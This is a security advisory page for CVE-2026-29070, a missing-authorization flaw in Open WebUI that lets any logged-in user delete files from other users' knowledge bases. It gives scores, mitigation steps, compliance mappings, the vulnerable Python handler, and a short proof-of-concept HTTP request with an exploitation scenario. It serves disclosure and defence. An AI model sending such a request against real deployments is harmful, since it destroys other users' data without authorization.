CVE-2026-29070: open-webui: missing authz allows cross-KB file deletion

GHSA-26gm-93rw-cchf MEDIUM PoC AVAILABLE CISA: TRACK*
Published March 27, 2026
CISO Take

Any authenticated Open WebUI user can destroy files in knowledge bases they don't own — just by knowing a file ID. This directly sabotages RAG pipelines: an attacker can silently gut a colleague's knowledge base, degrading AI assistant quality without triggering obvious errors. Patch to 0.8.6 immediately; if you can't, restrict knowledge base write access to trusted users only.

What is the risk?

CVSS 5.4 understates operational impact in AI environments. The exploit is trivial (valid session + any file ID), the PoC is public, and Open WebUI is widely deployed in enterprise AI stacks. The EPSS (0.00031) reflects low current exploitation, but the barrier to abuse is minimal. Highest risk in multi-tenant or shared Open WebUI deployments where users operate separate knowledge bases for different projects or sensitivity levels.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Open WebUI pip < 0.8.6 0.8.6
143.3K Pushed 8d ago 77% patched ~5d to patch Full package profile →

Do you use Open WebUI? You're affected.

How severe is it?

CVSS 3.1
5.4 / 10
EPSS
0.3%
chance of exploitation in 30 days
Higher than 16% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C None
I Low
A Low

What should I do?

5 steps
  1. Upgrade open-webui pip package to >= 0.8.6 (fix validates file-to-knowledge-base ownership before deletion).

  2. If immediate patching is blocked: restrict knowledge base write permissions to admin-only via Open WebUI RBAC settings.

  3. Audit access logs for anomalous POST requests to /api/v1/knowledge/{id}/file/remove where the {id} does not match the authenticated user's own knowledge bases.

  4. Back up knowledge base contents and vector collections regularly — this attack leaves no recoverable state.

  5. Rotate API bearer tokens if unauthorized deletions are suspected.

What does CISA's SSVC say?

Decision Track*
Exploitation poc
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2 - Access control for AI systems
NIST AI RMF
MANAGE-2.2 - Manage AI risks related to data quality and integrity
OWASP LLM Top 10
LLM08:2025 - Vector and Embedding Weaknesses

Frequently Asked Questions

What is CVE-2026-29070?

Any authenticated Open WebUI user can destroy files in knowledge bases they don't own — just by knowing a file ID. This directly sabotages RAG pipelines: an attacker can silently gut a colleague's knowledge base, degrading AI assistant quality without triggering obvious errors. Patch to 0.8.6 immediately; if you can't, restrict knowledge base write access to trusted users only.

Is CVE-2026-29070 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2026-29070, increasing the risk of exploitation.

How to fix CVE-2026-29070?

1. Upgrade open-webui pip package to >= 0.8.6 (fix validates file-to-knowledge-base ownership before deletion). 2. If immediate patching is blocked: restrict knowledge base write permissions to admin-only via Open WebUI RBAC settings. 3. Audit access logs for anomalous POST requests to /api/v1/knowledge/{id}/file/remove where the {id} does not match the authenticated user's own knowledge bases. 4. Back up knowledge base contents and vector collections regularly — this attack leaves no recoverable state. 5. Rotate API bearer tokens if unauthorized deletions are suspected.

What systems are affected by CVE-2026-29070?

This vulnerability affects the following AI/ML architecture patterns: RAG pipelines, knowledge management systems, multi-user AI platforms, vector databases.

What is the CVSS score for CVE-2026-29070?

CVE-2026-29070 has a CVSS v3.1 base score of 5.4 (MEDIUM). The EPSS exploitation probability is 0.25%.

What is the AI security impact?

Affected AI Architectures

RAG pipelinesknowledge management systemsmulti-user AI platformsvector databases

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application
AML.T0059 Erode Dataset Integrity
AML.T0085.000 RAG Databases
AML.T0101 Data Destruction via AI Agent Tool Invocation

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.6.2
NIST AI RMF: MANAGE-2.2
OWASP LLM Top 10: LLM08:2025

What are the technical details?

Original Advisory

### Summary An access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id) ### Details The source code at https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/knowledge.py#L803 does not properly validate that the file being deleted belongs to the current knowledge base: ``` @router.post("/{id}/file/remove", response_model=Optional[KnowledgeFilesResponse]) def remove_file_from_knowledge_by_id( id: str, form_data: KnowledgeFileIdForm, delete_file: bool = Query(True), user=Depends(get_verified_user), db: Session = Depends(get_session), ): knowledge = Knowledges.get_knowledge_by_id(id=id, db=db) [...] # Note : Access control check on the knowledge base if ( knowledge.user_id != user.id and not AccessGrants.has_access( user_id=user.id, resource_type="knowledge", resource_id=knowledge.id, permission="write", db=db, ) and user.role != "admin" ): raise HTTPException( status_code=status.HTTP_400_BAD_REQUEST, detail=ERROR_MESSAGES.ACCESS_PROHIBITED, ) file = Files.get_file_by_id(form_data.file_id, db=db) [...] # Note : No checks on the file if delete_file: try: # Remove the file's collection from vector database file_collection = f"file-{form_data.file_id}" if VECTOR_DB_CLIENT.has_collection(collection_name=file_collection): VECTOR_DB_CLIENT.delete_collection(collection_name=file_collection) except Exception as e: log.debug("This was most likely caused by bypassing embedding processing") log.debug(e) pass # Delete file from database Files.delete_file_by_id(form_data.file_id, db=db) [...] ``` ### PoC Victim has a knowledge base with a file (id: 9db6dcee-bb3b-483e-aaf3-310fda366af1) Attacker creates their own collection (id: dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b) Attacker deletes the victim file from their own collection: ``` POST /api/v1/knowledge/dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b/file/remove HTTP/1.1 Host: gaius-neo-val.fr.space.corp Authorization: Bearer eyJhbGciOiJIUzI1[...]nHiaod-3vfNE0 [...] {"file_id":"9db6dcee-bb3b-483e-aaf3-310fda366af1"} ----- HTTP/1.1 200 OK [...] ``` The file is then deleted from the victim's knowledge base. ### Impact Arbitrary file deletion

Exploitation Scenario

An attacker with a standard user account on a shared Open WebUI instance (e.g., a corporate AI assistant deployment) creates their own empty knowledge base to obtain a valid collection ID. Through normal use or by observing network traffic, they collect file IDs from a victim's knowledge base — file IDs are UUIDs exposed in API responses. The attacker then sends a POST to their own knowledge base endpoint with the victim's file IDs in the request body. The server checks write access only on the attacker's knowledge base (granted), skips ownership validation on the file, and deletes it from the victim's knowledge base and vector store. A targeted attacker could systematically enumerate and delete all files from critical enterprise knowledge bases (HR policies, security runbooks, compliance docs) that feed production AI assistants, causing silent knowledge degradation.

Weaknesses (CWE)

CWE-862 — Missing Authorization: The product does not perform an authorization check when an actor attempts to access a resource or perform an action.

  • [Architecture and Design] Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries. Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
  • [Architecture and Design] Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Timeline

Published
March 27, 2026
Last Modified
March 27, 2026
First Seen
March 27, 2026

Related Vulnerabilities